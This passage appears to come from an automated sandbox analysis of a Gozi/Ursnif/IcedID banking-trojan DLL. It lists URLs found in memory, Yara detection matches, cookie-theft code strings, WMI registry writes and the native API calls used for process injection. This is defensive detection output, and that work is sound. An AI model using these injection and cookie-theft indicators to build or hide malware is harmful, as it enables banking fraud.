          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: loaddll32.exe, 00000000.00000002.474298225.000000006E56E000.00000002.00020000.sdmp, SecuriteInfo.com.BScope.TrojanBanker.IcedID.dllString found in binary or memory: http://www.openssl.org/V
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: powershell.exe, 0000001C.00000002.526166101.000002219006F000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 0000001C.00000002.526166101.000002219006F000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 0000001C.00000002.526166101.000002219006F000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 0000001C.00000002.509128308.000002218020E000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 0000001C.00000002.526166101.000002219006F000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.387854313.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.387825227.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.394470622.0000000005C1B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.387917414.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.387785430.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.387944110.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.457563065.0000000003350000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000003.466656010.00000234DC590000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.387897096.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.387985412.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.387963889.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4880, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 3412, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3888, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
          Source: loaddll32.exe, 00000000.00000002.471966557.0000000000DCB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Detected Gozi e-Banking trojanShow sources
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff1_2_060222F7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie1_2_060222F7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff1_2_060222F7
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.387854313.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.387825227.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.394470622.0000000005C1B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.387917414.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.387785430.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.387944110.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.457563065.0000000003350000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000003.466656010.00000234DC590000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.387897096.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.387985412.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.387963889.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4880, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 3412, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3888, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000025.00000003.466656010.00000234DC590000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Writes registry values via WMIShow sources
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D23C5 NtQueryVirtualMemory,0_2_6E4D23C5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_032E4F73 GetProcAddress,NtCreateSection,memset,1_2_032E4F73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_032E11A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,1_2_032E11A9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_032E34D0 NtMapViewOfSection,1_2_032E34D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_032EB159 NtQueryVirtualMemory,1_2_032EB159
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_06015E21 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,1_2_06015E21
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_06005E8A NtQueryInformationProcess,1_2_06005E8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0601C6FE NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,1_2_0601C6FE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_06008F6D NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_06008F6D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_060077B0 NtMapViewOfSection,1_2_060077B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0601FFF2 GetProcAddress,NtCreateSection,memset,1_2_0601FFF2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0600CCD9 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,1_2_0600CCD9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0600E529 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,1_2_0600E529
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_06010D8D memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,1_2_06010D8D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_06022AAC NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,1_2_06022AAC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0600F314 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_0600F314
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_06025868 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,1_2_06025868
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_06022E10 NtQuerySystemInformation,RtlNtStatusToDosError,1_2_06022E10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0600E6C4 memset,NtQueryInformationProcess,1_2_0600E6C4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_060117CD memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,1_2_060117CD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_06014518 NtGetContextThread,RtlNtStatusToDosError,1_2_06014518
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_060105FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,1_2_060105FC
